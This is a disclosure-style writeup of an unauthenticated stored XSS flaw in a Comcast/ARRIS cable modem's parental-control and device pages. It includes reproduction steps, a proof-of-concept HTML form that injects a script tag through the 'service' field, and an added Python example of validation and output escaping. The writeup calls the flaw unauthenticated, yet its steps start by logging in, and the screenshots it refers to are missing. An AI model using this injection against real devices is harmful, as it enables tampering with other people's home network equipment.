Comcast Cable Modem (Unauthenticated Stored XSS)

Credit Nu11By73


The Comcast home cable modem version TG1682G was found by researchers to contain a stored cross-site scripting (XSS) vulnerability. An attacker on the local network can exploit it without authentication.

Device Description:
1 port residential gateway
Hardware Version:
Original Software Version:
Software Image:
Advanced Services:

Exploitation Writeup

The Comcast ARRIS home cable modem was tested for many different vulnerabilities. This testing led to the identification of a stored cross-site scripting vulnerability that could be exploited without authentication. Below is the proof of concept code that was used to issue an HTTP POST to the backend software.


Managed Devices
1. Log in to the modem
2. Click parental control
3. Click managed devices
4. Click add blocked device
5. In the custom device boxes type what is shown in the first image and click save
6. When the page refreshes you will see the popup

Managed Services
1. Click on the managed services button
2. Click on the add button next to blocked services
3. Enter the information shown in the first screenshot below and click save
4. Once the site is done rendering you will receive the popup

Connected Devices
1. Click connected devices
2. Click add device with reserved ip
3. Add the information shown in the first screenshot below
4. Click save and wait for the page to refresh to receive the popups

Proof of concept code:
The code below was used to exploit the application.

Managed Services POC
<p>Unauth Stored XSS - Xfinity Modem</p>
<form method="POST" action="">
<input type="hidden" name="set" value="true" />
<input type="hidden" name="UMSStatus" value="Enabled" />
<input type="hidden" name="add" value="true" />
<input type="hidden" name="service" value="test><script>alert(1)</script>" />
<input type="hidden" name="protocol" value="TCP" />
<input type="hidden" name="startPort" value="1" />
<input type="hidden" name="endPort" value="2" />
<input type="hidden" name="block" value="true" />
<input type="submit" title="Enable Service" />
</form>
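
Server-side handling that would close both halves of this issue for the Managed Services form, added here as an example and not taken from the modem firmware or the original writeup: reject the POST without an authenticated session, validate the posted fields, and HTML-escape stored values when the page is rendered. The function names, the `authenticated` flag, the service-name pattern and the protocol list are assumptions; the field names and sample values come from the PoC form above.

```python
import html
import re

# Assumed policy for this sketch: short names from a conservative character set.
SERVICE_NAME_RE = re.compile(r"[A-Za-z0-9 _.-]{1,32}")
PROTOCOLS = {"TCP", "UDP", "TCP/UDP"}  # assumed list; the page only shows TCP

# Sample input: the fields posted by the PoC form on this page.
POC_FORM = {"set": "true", "UMSStatus": "Enabled", "add": "true",
            "service": "test><script>alert(1)</script>", "protocol": "TCP",
            "startPort": "1", "endPort": "2", "block": "true"}


def validate_blocked_service(form, authenticated):
    """Return (record, errors); `authenticated` is a hypothetical session flag."""
    if not authenticated:
        return None, ["authentication required"]
    errors = []
    service = form.get("service", "")
    if not SERVICE_NAME_RE.fullmatch(service):
        errors.append("service: invalid characters or length")
    protocol = form.get("protocol", "")
    if protocol not in PROTOCOLS:
        errors.append("protocol: unsupported value")
    ports = {}
    for field in ("startPort", "endPort"):
        raw = form.get(field, "")
        if raw.isascii() and raw.isdigit() and 1 <= int(raw) <= 65535:
            ports[field] = int(raw)
        else:
            errors.append(f"{field}: must be 1-65535")
    if len(ports) == 2 and ports["startPort"] > ports["endPort"]:
        errors.append("startPort must not exceed endPort")
    if errors:
        return None, errors
    return {"service": service, "protocol": protocol, **ports}, []


def render_service_row(record):
    """Render one table row, HTML-escaping every stored value on output."""
    cells = (record["service"], record["protocol"],
             record["startPort"], record["endPort"])
    return "<tr>" + "".join(
        f"<td>{html.escape(str(c), quote=True)}</td>" for c in cells) + "</tr>"


if __name__ == "__main__":
    print(validate_blocked_service(POC_FORM, authenticated=True))
```

Escaping in `render_service_row` still matters when validation is in place, because records stored before the fix may already contain markup.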